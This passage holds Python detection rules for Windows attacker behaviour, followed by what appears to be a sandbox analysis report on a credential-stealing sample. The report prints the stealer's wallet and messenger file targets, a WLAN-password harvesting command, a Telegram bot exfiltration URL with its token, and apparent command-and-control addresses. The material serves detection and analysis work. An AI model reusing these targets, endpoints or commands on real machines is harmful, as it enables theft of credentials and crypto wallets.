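    m = re.search(r"\bDEL\s+/F[^&]*\\Temp\\([^\"\s&]+)", ev["command_line"], re.I)
    return Finding("dropper_self_delete", ev["image"], f"deletes Temp\\{m.group(1)}") if m else None

def rule_wifi_profile_harvest(ev):
    m = re.search(r"netsh(\.exe)?\s+wlan\s+show\s+profiles?\b(.*)", ev["command_line"], re.I)
    if not m:
        return None
    plaintext = "key=clear" in m.group(2).lower()
    return Finding("wifi_profile_harvest", ev["image"],
                   "key=clear: PSK recovered in plaintext" if plaintext else "enumerates saved WLAN profiles")

def rule_ssh_reverse_tunnel(ev):
    cl = ev["command_line"]
    fwd = re.search(r"\s-R\s+(\S+)", cl)
    if not re.search(r"\bssh(\.exe)?\b", cl, re.I) or not fwd:
        return None
    host = cl.split()[-1].strip('"')
    hk = "host key checking disabled" if "StrictHostKeyChecking=no" in cl else "host key checking on"
    return Finding("ssh_reverse_tunnel", ev["image"], f"exposes {fwd.group(1)} through {host}; {hk}")

def rule_uac_disabled(ev):
    if ev["key"].lower().endswith(r"\policies\system") and ev["value"].lower() == "enablelua":
        return Finding("uac_disabled", ev["image"], f"EnableLUA written (data={ev.get('data')}); 0 turns UAC off")
    return None

PROCESS_RULES = [rule_defender_exclusion, rule_schtasks_persistence, rule_dropper_self_delete,
                 rule_wifi_profile_harvest, rule_ssh_reverse_tunnel]
REGISTRY_RULES = [rule_uac_disabled]

def run_rules(process_events, registry_events):
    """Apply every rule to every event; returns the findings in event order."""
    findings = []
    for ev in process_events:
        findings += [f for rule in PROCESS_RULES if (f := rule(ev))]
    for ev in registry_events:
        findings += [f for rule in REGISTRY_RULES if (f := rule(ev))]
    return findings

if __name__ == "__main__":
    for f in run_rules(PROCESS_EVENTS, REGISTRY_EVENTS):
        print(f"[{f.rule}] {f.image}\n    {f.detail}")
```

The rules are deliberately narrow so they can be dropped into a Sigma-style pipeline one at a time; the breadth check in rule_defender_exclusion is the one worth tuning, since an exclusion for a single file is common administrative noise while an exclusion for C:\Windows or a whole profile almost never is.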

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command 
name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: powershell.exe, 00000001.00000002.1715254235.00000000062C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match, File source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara matchFile source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  MITRE ATT&CK Matrix (techniques listed per tactic; a number preceding a technique name is reproduced exactly as it appears in the report for that technique)

                  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                  • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                  • Execution: 221 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers
                  • Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                  • Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items
                  • Defense Evasion: 31 Disable or Modify Tools; 2 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 161 Virtualization/Sandbox Evasion; 11 Process Injection
                  • Credential Access: 1 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                  • Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 241 Security Software Discovery; 1 Process Discovery; 161 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
                  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                  • Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
                  • Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Commonly Used Port
                  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
                  Behavior Graph (ID: 1390172; Sample: jqOHOuPMJP.exe; Start date: 10/02/2024; Architecture: WINDOWS; Score: 100)

                  Start node:
                  • Contacted domains: api.telegram.org, serveo.net, ip-api.com
                  • Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 11 other signatures
                  • api.telegram.org: Uses the Telegram API (likely for C&C communication)
                  • Processes started: jqOHOuPMJP.exe (node 11); vkefq4cv.oil.exe (node 16); vkefq4cv.oil.exe (node 18); 3 other processes

                  jqOHOuPMJP.exe (node 11):
                  • Network: 82.147.85.194, ports 49729, 80 (SIBTEL-ASRU, Russian Federation)
                  • Dropped: C:\Users\user\AppData\...\vkefq4cv.oil.exe (PE32)
                  • Signatures: Adds a directory exclusion to Windows Defender; Disables UAC (registry)
                  • Processes started: vkefq4cv.oil.exe (node 22); powershell.exe (node 26)

                  vkefq4cv.oil.exe (node 16):
                  • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Tries to harvest and steal WLAN passwords
                  • Processes started: cmd.exe (node 28); cmd.exe (node 30); ssh.exe (node 32); WerFault.exe (node 34)

                  vkefq4cv.oil.exe (node 22):
                  • Dropped: C:\Users\user\AppData\...\vkefq4cv.oil.exe (PE32)
                  • Signatures: Machine Learning detection for dropped file; Found many strings related to Crypto-Wallets (likely being stolen)
                  • Processes started: cmd.exe (node 36)

                  powershell.exe (node 26):
                  • Processes started: WmiPrvSE.exe; conhost.exe

                  cmd.exe (node 28):
                  • Signatures: Tries to harvest and steal WLAN passwords
                  • Processes started: conhost.exe; chcp.com; netsh.exe; findstr.exe

                  cmd.exe (node 30):
                  • Processes started: 4 other processes

                  ssh.exe (node 32):
                  • Processes started: conhost.exe

                  cmd.exe (node 36):
                  • Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
                  • Processes started: vkefq4cv.oil.exe (node 55); conhost.exe; timeout.exe; 2 other processes

                  vkefq4cv.oil.exe (node 55):
                  • Network: ip-api.com 208.95.112.1, ports 49737, 49739, 80 (TUT-ASUS, United States); api.telegram.org 149.154.167.220, ports 443, 49743, 49744 (TELEGRAMRU, United Kingdom); 2 other IPs or domains
                  • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 3 other signatures
                  • Processes started: cmd.exe (node 65); cmd.exe (node 68); ssh.exe (node 70)

                  cmd.exe (node 65):
                  • Signatures: Tries to harvest and steal WLAN passwords
                  • Processes started: conhost.exe; chcp.com; netsh.exe; findstr.exe

                  cmd.exe (node 68):
                  • Processes started: conhost.exe; chcp.com; netsh.exe; findstr.exe

                  ssh.exe (node 70):
                  • Network: serveo.net 138.68.79.95, ports 22, 49740, 49742 (DIGITALOCEAN-ASNUS, United States)
                  • Processes started: conhost.exe

                  SourceDetectionScannerLabelLink
                  jqOHOuPMJP.exe13%ReversingLabs
                  jqOHOuPMJP.exe24%VirustotalBrowse
                  jqOHOuPMJP.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe100%Joe Sandbox ML
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  serveo.net8%VirustotalBrowse
Contacted domains (Name / IP / Active / Malicious / Antivirus Detection / Reputation):
  serveo.net, 138.68.79.95, active: true, malicious: false, reputation: unknown
  ip-api.com, 208.95.112.1, active: true, malicious: false, reputation: high
  api.telegram.org, 149.154.167.220, active: true, malicious: false, reputation: high
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://212.6.44.53:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • 1%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://185.217.98.121:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • 15%, Virustotal, Browse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://api.telegram.orgvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessagevkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://44.228.161.50:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 2%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://104.248.208.221:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 1%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://164.90.185.9:443vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 9%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://www.w3.vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://18.228.80.130:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • 11%, Virustotal, Browse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contoso.com/powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://185.217.98.121:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 11%, Virustotal, Browse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://193.142.58.127:80Pkvkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        low
                                                                                        https://e2111f95f52ba8be6b2d3394e38b1722.serveo.netvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://e483612b93e055308d0c85f365c474ee.serveo.netvkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icovkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://144.126.132.141:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://pesterbdd.com/i?powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://18.178.28.151:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://82.147.85.194/byte/jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          http://upx.sf.netAmcache.hve.41.drfalse
                                                                                            high
                                                                                            http://127.0.0.1:6787/ing=novkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://149.88.44.159:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://82.147.85.194jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
